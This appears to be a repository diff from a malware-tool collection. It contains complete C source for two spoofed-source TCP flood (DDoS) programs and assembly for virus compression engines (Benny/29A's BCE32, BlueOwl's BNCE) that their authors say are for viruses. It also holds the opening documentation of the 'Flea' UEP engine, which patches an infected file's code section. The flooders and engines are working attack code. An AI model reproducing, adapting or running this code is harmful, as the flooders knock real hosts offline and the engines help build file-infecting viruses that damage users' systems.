void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
setup_ip_header(iph);
setup_tcp_header(tcph);
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(0));
fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

220
libs/VirTool.DDoS.ZAP.c Normal file
View File

@ -0,0 +1,220 @@
/*
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = rand();
tcph->res2 = 0;
tcph->doff = 5;
tcph->psh = 1;
tcph->ack = 1;
tcph->urg = 1;
tcph->window = rand();
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

416
libs/VirTool.Win32.Compression.Benny.asm Normal file
View File

@ -0,0 +1,416 @@
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ÚÄ Benny's Compression Engine for Win32 Ä¿ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; ³ by ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ Benny / 29A ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
;
;
;Hello everybody,
;
;let me introduce my second compression engine for Win32 enviroment (u can
;find my first engine in Win32.Benny and Win98.Milennium). This engine
;worx on "compressin' bit groups" base. When I started to write this stuff,
;i wanted to write engine, that would work on Huffmann base. Then I decided
;it's not needed to implement this complicated algorithm here, coz I wanna
;be this engine small and effective.
;
;Not only this is truth. This engine is very fast, very small (only 478 bytes)
;and has implemented my special compression algorithm, that is simple and has
;very, ehrm, let's call it "interesting" compression ratio X-D.
;
;
;
;So how does it work ?
;======================
;
;I said, this engine worx on "compressin' bit groups" base. What does it mean ?
;Bit group (as I call it) is group of two bits. U know, every byte has 8 bits.
;
;Example: byte 9Ah group0 group1 group2 group3
; 10011010 ===> 10 10 01 10
;
;As u can see, every byte has 4 bit groups and I said, it compresses
;bit groups. Heh, u think i'm crazy when im tryin' to compress
;two bits, yeah :?)
;
;
;This engine will (on the beginnin') calculate, which bit group has
;the biggest count of repetency, which second biggest, etc...
;
;Example: group count
; 00 ===> 74
; 01 ===> 32
; 10 ===> 12
; 11 ===> 26
;
;
;That's not all. It has to sort items to know, which group has the biggest
;count. I decided it's best to use "bubble sort algorithm". Then there isn't
;any problem to use "our algorithm".
;Look at this table, when in first column r sorted groups and in second
;comlumn r <another> bits, which will represent new compressed data.
;
;Sorted by count: 1. ===> 1
; 2. ===> 00
; 3. ===> 010
; 4. ===> 011
;
;Finally, engine will replace bit groups with these bits.
;Gewd thing on this algorithm is that there aren't needed same bytes to have
;good compression ratio, but only some bits.
;So now u know whole secret of my compression algorithm. U also know, why
;I said, it has "interesting compression ratio". Look at the table and u will
;see, what type of files can we strongly compress. They r both of binaries
;and texts, but not every binaries or texts can be compressed as well as otherz.
;We can compress some binaries again with the same or better ratio. Why ?
;Imagine, u have file with 1000x 0x0s. After compression we have 125x 0xFFs, that
;can be compressed again. Some files can be after compression (negative even -
;file is bigger) compressed again with positive compression (file is smaller).
;Heh, crazy, isn't it ? X-DDD.
;
;
;
;How can I use BCE32 in my virus ?
;==================================
;
;BCE32 is placed in two procedures called BCE32_Compress and BCE32_Decompress.
;
;
;a) BCE32_Compress:
;-------------------
;Input state:
; 1) ESI register - pointer to data, which will be compressed
; 2) EDI register - pointer to memory, where will be placed compressed data
; 3) ECX register - number of bytes to compress + 1 (do not forget "+ 1" !)
; 4) EBX register - work memory (16 bytes)
; 5) EDX register - work memory (16 bytes). MUST NOT be same as EBX !
;
; call BCE32_Compress
;
;Output state:
; 1) EAX register - new size of compressed data
; 2) CF set, if negative compression
; 3) Other registers r preserved (except FLAGS)
;
;
;b) BCE32_Decompress:
;---------------------
;Input state:
; 1) ESI register - pointer to compressed data
; 2) EDI register - pointer to memory, where will be placed decompressed data
; 3) ECX register - number of bytes to decompress (EAX value returned by
; BCE32_Compress) - 1 (do not forget "- 1" !)
;
; call BCE32_Decompress
;
;Output state:
; 1) All registers r preserved
;
;
;WARNING: Be sure, u have enought memory for case of negative compression.
;NOTE: U can compress (in some special cases) already compressed data.
; For this purpose exists output parameters EAX and CF.
;
;
;
;Do u like this (or my another work) ?
;======================================
;
;Gimme know. If u have some notes or commentz for this, for another work,
;or if u simply like it, mail me to benny@post.cz. Thanx.
;
;
;
;Don't u like it ?
;==================
;
;Fuck u.
;
;
;
;(c) by Benny/29A May 1999.
BCE32_Compress Proc ;compression procedure
pushad ;save all regs
;stage 1
pushad ;and again
create_table:
push ecx ;save for l8r usage
push 4
pop ecx ;ECX = 4
lodsb ;load byte to AL
l_table:push eax ;save it
xor edx, edx ;EDX = 0
and al, 3 ;this stuff will separate and test
je st_end ;bit groups
cmp al, 2
je st2
cmp al, 3
je st3
st1: inc edx ;01
jmp st_end
st2: inc edx ;10
inc edx
jmp st_end
st3: mov dl, 3 ;11
st_end: inc dword ptr [ebx+4*edx] ;increment count in table
pop eax
ror al, 2 ;next bit group
loop l_table
pop ecx ;restore number of bytes
loop create_table ;next byte
push 4 ;this will check for same numbers
pop ecx ;ECX = 4
re_t: cdq ;EDX = 0
t_loop: mov eax, [ebx+4*edx] ;load DWORD
inc dword ptr [ebx+4*edx] ;increment it
cmp eax, [ebx] ;test for same numbers
je _inc_ ;...
cmp eax, [ebx+4] ;...
je _inc_ ;...
cmp eax, [ebx+8] ;...
je _inc_ ;...
cmp eax, [ebx+12] ;...
jne ninc_ ;...
_inc_: inc dword ptr [ebx+4*edx] ;same, increment it
inc ecx ;increment counter (check it in next turn)
ninc_: cmp dl, 3 ;table overflow ?
je re_t ;yeah, once again
inc edx ;increment offset to table
loop t_loop ;loop
popad ;restore regs
;stage 2
pushad ;save all regs
mov esi, ebx ;get pointer to table
push 3
pop ebx ;EBX = 3
mov ecx, ebx ;ECX = 3
rep_sort: ;bubble sort = the biggest value will
;always "bubble up", so we know number
;steps
push ecx ;save it
mov ecx, ebx ;set pointerz
mov edi, edx ;...
push edx ;save it
lodsd ;load DWORD (count)
mov edx, eax ;save it
sort: lodsd ;load next
cmp eax, edx ;is it bigger
jb noswap ;no, store it
xchg eax, edx ;yeah, swap DWORDs
noswap: stosd ;store it
loop sort ;next DWORD
mov eax, edx ;biggest in EDX, swap it
stosd ;and store
lea esi, [edi-16] ;get back pointer
pop edx ;restore regs
pop ecx
loop rep_sort ;and try next DWORD
popad
;stage 3
pushad ;save all regs
xor eax, eax ;EAX = 0
push eax ;save it
push 4
pop ecx ;ECX = 4
n_search:
push edx ;save regs
push ecx
lea esi, [ebx+4*eax] ;get pointer to table
push eax ;store reg
lodsd ;load DWORD to EAX
push 3
pop ecx ;ECX = 3
mov edi, ecx ;set pointerz
search: mov esi, edx
push eax ;save it
lodsd ;load next
mov ebp, eax
pop eax
cmp eax, ebp ;end ?
je end_search
dec edi ;next search
add edx, 4
loop search
end_search:
pop eax ;and next step
inc eax
pop ecx
pop edx
add [esp], edi
rol byte ptr [esp], 2
loop n_search
pop [esp.Pushad_ebx] ;restore all
popad ;...
;stage 4
xor ebp, ebp ;EBP = 0
xor edx, edx ;EDX = 0
mov [edi], bl ;store decryption key
inc edi ;increment pointer
next_byte:
xor eax, eax ;EAX = 0
push ecx
lodsb ;load next byte
push 4
pop ecx ;ECX = 4
next_bits:
push ecx ;store regs
push eax
and al, 3 ;separate bit group
push ebx ;compare with next group
and bl, 3
cmp al, bl
pop ebx
je cb0
push ebx ;compare with next group
ror bl, 2
and bl, 3
cmp al, bl
pop ebx
je cb1
push ebx ;compare with next group
ror bl, 4
and bl, 3
cmp al, bl
pop ebx
je cb2
push 0 ;store bit 0
call copy_bit
push 1 ;store bit 1
call copy_bit
cb0: push 1 ;store bit 1
end_cb1:call copy_bit
pop eax
pop ecx
ror al, 2
loop next_bits ;next bit
pop ecx
loop next_byte ;next byte
mov eax, edi ;save new size
sub eax, [esp.Pushad_edi] ;...
mov [esp.Pushad_eax], eax ;...
popad ;restore all regs
cmp eax, ecx ;test for negative compression
jb c_ok ;positive compression
stc ;clear flag
ret ;and quit
c_ok: clc ;negative compression, set flag
ret ;and quit
cb1: push 0 ;store bit 0
end_cb2:call copy_bit
push 0 ;store bit 0
jmp end_cb1
cb2: push 0 ;store bit 0
call copy_bit
push 1 ;store bit 1
jmp end_cb2
copy_bit:
mov eax, ebp ;get byte from EBP
shl al, 1 ;make space for next bit
or al, [esp+4] ;set bit
cbit: inc edx ;increment counter
cmp dl, 8 ;byte full ?
jne n_byte ;no, continue
stosb ;yeah, store byte
xor eax, eax ;and prepare next one
cdq ;...
n_byte: mov ebp, eax ;save back byte
ret Pshd ;quit from procedure with one parameter on stack
db '[BCE32]', 0 ;little signature
BCE32_Compress EndP ;end of compression procedure
BCE32_Decompress Proc ;decompression procedure
pushad ;save all regs
xor eax, eax ;EAX = 0
xor ebp, ebp ;EBP = 0
cdq ;EDX = 0
lodsb ;load decryption key
push eax ;store it
lodsb ;load first byte
push 8 ;store 8
push edx ;store 0
d_bits: push ecx ;store ECX
test al, 80h ;test for 1
jne db0
test al, 0c0h ;test for 00
je db1
test al, 0a0h ;test for 010
je db2
mov cl, 6 ;its 011
jmp tb2
testb: test bl, 1 ;is it 1 ?
jne p1
push 0 ;no, store 0
_tb_: mov eax, ebp ;load byte to EAX
or al, [esp] ;set bit
ror al, 1 ;and make space for next one
call cbit ;end of procedure
ret ;...
p1: push 1 ;store 1
jmp _tb_ ;and continue
db0: xor cl, cl ;CL = 0
mov byte ptr [esp+4], 1 ;store 1
testbits:
push eax ;store it
push ebx ;...
mov ebx, [esp+20] ;load parameter
ror bl, cl ;shift to next bit group
call testb ;test bit
ror bl, 1 ;next bit
call testb ;test it
pop ebx ;restore regs
pop eax
mov ecx, [esp+4] ;load parameter
bcopy: cmp byte ptr [esp+8], 8 ;8. bit ?
jne dnlb ;nope, continue
mov ebx, eax ;load next byte
lodsb
xchg eax, ebx
mov byte ptr [esp+8], 0 ;and nulify parameter
dec dword ptr [esp] ;decrement parameter
dnlb: shl al, 1 ;next bit
test bl, 80h ;is it 1 ?
je nb ;no, continue
or al, 1 ;yeah, set bit
nb: rol bl, 1 ;next bit
inc byte ptr [esp+8] ;increment parameter
loop bcopy ;and align next bits
pop ecx ;restore ECX
inc ecx ;test flags
dec ecx ;...
jns d_bits ;if not sign, jump
pop eax ;delete pushed parameters
pop eax ;...
pop eax ;...
popad ;restore all regs
ret ;and quit
db1: mov cl, 2 ;2. bit in decryption key
mov [esp+4], cl ;2 bit wide
jmp testbits ;test bits
db2: mov cl, 4 ;4. bit
tb2: mov byte ptr [esp+4], 3 ;3 bit wide
jmp testbits ;test bits
BCE32_Decompress EndP ;end of decompression procedure

BIN
libs/VirTool.Win32.Compression.Bpce.7z Normal file
View File

Binary file not shown.

198
libs/VirTool.Win32.Compression.Nibble.asm Normal file
View File

@ -0,0 +1,198 @@
; BNCE - BlueOwls Nibble Compression Engine
; *****************************************
;
; Introduction
; ************
;
; I made this engine for virusses which want to use some algorithm to make
; themselves or something else smaller (obviously), but i wanted the
; algorithm to be small too, because if it isn't it would have little use
; for virusses. In this case, I tried to make the decompressor as small as
; possible, and let the compressor do most of the work.
;
; How it works
; ************
;
; Every byte has 4 nibbles and these can be compressed. The compression is
; done by counting the number of nibbles in the entire data and change
; the nibble sizes accordingly. The most common of the four possible
; nibbles will be compressed, #2 will stay the same size and #3 & #4 will
; be expanded. This means that as long as the number #1s > the numbers
; #3+#4 compression occurs, otherwise the data will be expanded. The
; maximum reducement is 50%, and the maximum enlargement is 112,5%.
;
; Notes
; *****
;
; - The bnce_compress and bnce_decompress are not in any way dependent on
; each other, and both do not use any (external) data, you can run them
; without the write flag set.
; - A small optimization is possible for the decryptor if you like to
; decrypt only one thing with a static size with it; remove the (*)
; lines in the compressor and change the (@) lines in mov ecx, size;
; or push size, pop ecx. It will save one or three bytes in the
; decompressor, wow! :P
; - I have not encounterd any bugs, and the only errors could arrise from
; a faulty parameters; too small output buffers or corrupted compressed
; data fed to the decompressor. All which are not very likely.
; - In some extreme cases, already compressed data can be compressed again
; but this is only possible when the are a lot of same nibble repeaten-
; cies; for example: 1111b becomes 00b; and 00b becomes 0b. But it does
; not occur very often.
; - As the maximum enlargement is 112,5% I would at least allocate an
; output buffer of size *12 /10 if the data is not static.
;
; Last words
; **********
;
; I made this engine for fun and I had fun with it, I hope you like it and
; can use it in someway. Feel free to modify it to your needs. See Notes
; for more details. Anyway, I hope you like it and if you like to let
; me know something please do and send mail to xblueowl@hotmail.com.
; I compiled this stuff with FASM, but you should be able to assemble this
; with any popular assembler (MASM/TASM/FASM/NASM?) :).
; compress
; in: esi = ptr to data to compress
; ecx = size of data to compress
; edi = ptr to output buffer
; out: edi = end of data put in output buffer
; size: 165 bytes
bnce_compress: push 03020100h ; push table
push esi
push ecx
sub eax, eax ; eax = 0
cdq ; edx = 0
push eax ; 4 counters for the 4 existing nibbles
push eax
push eax
push eax
count_bytes: push ecx ; save no. of bytes
push 4
pop ecx ; ecx = 4
lodsb
count_bits: sub ah, ah
shl eax, 2 ; ah = first 2 bits
mov dl, ah ; dl = 2 bits
inc dword [esp+4+edx*4] ; count it
loop count_bits
pop ecx
loop count_bytes ; now the 4 counters are filled with the correct values
sort_again: sub ecx, ecx ; ecx = 0
mov esi, esp ; esi = ptr to first counter
lodsd ; esi = ptr to next counter
no_bubble: inc ecx
cmp ecx, 4
jz sort_done ; if no changes were made 4 times bubbling is done
lodsd ; eax = this counter; esi = next counter
cmp [esi-8], eax ; compare to previous counter
jae no_bubble ; if previous counter is bigger or equal make no change
xchg [esi-8], eax ; swap counters
mov [esi-4], eax
mov al, [esp+23+ecx]; swap nibbles
xchg al, [esp+24+ecx]
mov [esp+23+ecx], al
jmp sort_again ; start over
sort_done: add esp, 16 ; delete counters (only nibbles remaining)
pop ecx ; ecx = size of data
pop esi ; esi = start of data
pop eax ; eax = nibble table
push eax
shl eax, 6 ; move up table
stosd ; save table
mov eax, ecx ; eax = ecx = size of data (*)
stosd ; save it (*)
sub edx, edx ; edx = 0 (bits stored counter)
compress_loop: push ecx
push 4
pop ecx ; ecx = 4
lodsb
compress_bits: sub ebx, ebx ; ebx = 0
sub ah, ah ; ah = 0
shl eax, 2 ; ah = xxb
inc ebx ; 1 bit large; output is: 0b
cmp ah, [esp+0+4] ; is it main compress byte?
jz move_bits
mov bh, 10000000b ; output is: 10b
inc ebx ; 2 bit large
cmp ah, [esp+1+4]
jz move_bits
mov bh, 11000000b
inc ebx ; 3 bit large; output is: 110b
cmp ah, [esp+2+4]
jz move_bits
mov bh, 11100000b ; output is: 111b
move_bits: shl dh, 1 ; get a free bit in dh
shl bh, 1 ; carry on/of
adc dh, 0 ; add it to dh
inc edx
mov [edi], dh
cmp dl, 8
jnz no_store_bits
inc edi
sub edx, edx
no_store_bits: dec bl
jnz move_bits
loop compress_bits
pop ecx
loop compress_loop
mov cl, 8
sub cl, dl
rol dh, cl ; make sure last byte's bits are placed correctly
mov [edi], dh
inc edi
pop eax ; table not needed anymore
ret
; decompress
;
; in: esi = pointer to data to be decompressed
; edi = pointer to output buffer
; out: edi = pointer to end of output buffer
; size: 54 bytes
bnce_decompress:lodsd
push eax ; push decoder table
lodsd ; (@)
xchg eax, ecx ; ecx = size when uncompressed (@)
mov dl, 8 ; indicate new byte needed
decompress_next:push ecx
push 4 ; start byte reconstruction (4 nibbles remaining)
pop ecx
decompress_loop:sub ebx, ebx ; type = 0
push ecx
push 3 ; repeat 3 times if necessary
pop ecx
find_type: cmp dl, 8 ; next byte needed?
jnz dont_fill
sub edx, edx ; clear bit-counter
lodsb ; load new byte
dont_fill: inc edx ; 1 bit is used from byte
shl al, 1 ; get the bit
jnc dmove_bits ; if it is off, type is found
inc ebx ; type ++
loop find_type ; repeat
dmove_bits: pop ecx ; restore ecx (stored bit counter)
mov dh, al ; save al
mov al, [esp+4+ebx] ; get appropiate bits
shl eax, 2 ; add bits to ah
mov al, dh ; restore al
loop decompress_loop ; if byte is not ready to be put, go on
mov [edi], ah ; save byte
inc edi ; move up ptr
pop ecx
loop decompress_next ; go on decompressing
pop eax
ret
; BlueOwl 23 august, 2004

775
libs/VirTool.Win32.Cryptor.Flea.asm Normal file
View File

@ -0,0 +1,775 @@
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ;
; xxxxxxxxxxx xxxx xxxxxxxxxxx xxxxxxxxxx ;
; xxxxxxxxxxx xxxx xxxxxxxxxxx xxxx xxxx ;
; xxxx xxxx xxxx xxxx xxxx ;
; xxxx xxxx xxxx xxxx xxxx ;
; xxxxxxxxx xxxx xxxxxxxxx xxxx xxxx ;
; xxxxxxxxx xxxx xxxxxxxxx xxxx xx xxxx ;
; xxxx xxxx xxxx xxxx xx xxxx ;
; xxxx xxxx xxxx xxxx xxxx xxxx ;
; xxxx xxxxxxxxxxx xxxxxxxxxxx xxxx xxxx ;
; xxxx xxxxxxxxxxx xxxxxxxxxxx xxxx xxxx ;
; ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; UEP ENGINE ;
; FLEA ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; :)! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; функция FLEA ;
; уеп(уёб) движок ;
; ;
; ;
;ВХОД: ;
;1 параметр (и единственный) - адрес структуры (UEPGEN) (ее описание смотри ниже) ;
;--------------------------------------------------------------------------------------------------------;
;ВЫХОД: ;
;EAX - абсолютный виртуальный адрес точки входа ;
;(а также самое главное: запись пятен в кодовую секцию с последующим сохранением оригинальных байт ;
;--------------------------------------------------------------------------------------------------------;
;ЗАМЕТКИ: ;
;структура, указатель на которую передан в качестве параметра, не портится, т.е. данные в ней после ;
;вызова данного движка остаются теми же. ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ОПИСАНИЕ СТРУКТУРЫ ;
; UEPGEN ;
; ;
; ;
;UEPGEN struct ;
; rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
; tgen_addr dd ? ;адрес Генератора Мусорных Инструкций ;
; mapped_addr dd ? ;база мэппинга файла (MapViewOfFile) ;
; xsection dd ? ;IMAGE_SECTION_HEADER секции, в которую после после передать управление ;
; reserved1 dd ? ;зарезервировано ;
;MORPHGEN ends ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ОПИСАНИЕ СТРУКТУРЫ ;
; T2GEN ;
; (aka TRASHGEN) ;
; (более детальное описание смотри в движке xTG) ;
; ;
; ;
;TRASHGEN struct ;
; rgen_addr dd ? ;адрес Генератора Случайных Чисел (ГСЧ) ;
; buf_for_trash dd ? ;адрес (буфер), куда записывать генерируемое (хех, качественное) дерьмо ;
; size_trash dd ? ;размер (в байтах), сколько мусора записать ;
; regs dd ? ;занятые регистры (2 шт) ;
; xmask1 dd ? ;64-битная маска для генерации ;
; xmask2 dd ? ;мусорных команд (ака фильтр) ;
; beg_addr dd ? ;начальный адрес ;
; end_addr dd ? ;конечный адрес ;
; mapped_addr dd ? ;зарезервировано (либо база мэпинга (ака адрес файла в памяти)) ;
; reserv1 dd ? ;зарезервировано (хз, может когда-то там что и будет) ;
;TRASHGEN ends ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ПОЯСНЕНИЕ К ПОЛЯМ СТРУКТУРЫ UEPGEN: ;
; ;
; ;
;[ rgen_addr ] : ;
; так как данный движок (FLEA) разработан без привязки к какому-либо другому мотору, ;
; а для генерации мусора (и некоторых других фич) важен ГСЧ, поэтому адрес ГСЧ ;
; хранится в (данном) поле структуры. ;
; ВАЖНО: если мотор FLEA будет использовать другой ГСЧ (а не тот, который ;
; идет с ним в комплекте), надо, чтобы этот другой ГСЧ принимал в качестве 1-го ;
; (и единственного!) параметра в стэке число (назовем его N), так как поиск будет в ;
; диапазоне [0..n-1]. И на выходе другой ГСЧ должен возвращать в EAX случайное число. ;
; Остальные регистры должны остаться неизменными. Все. ;
;--------------------------------------------------------------------------------------------------------;
;[ tgen_addr ] : ;
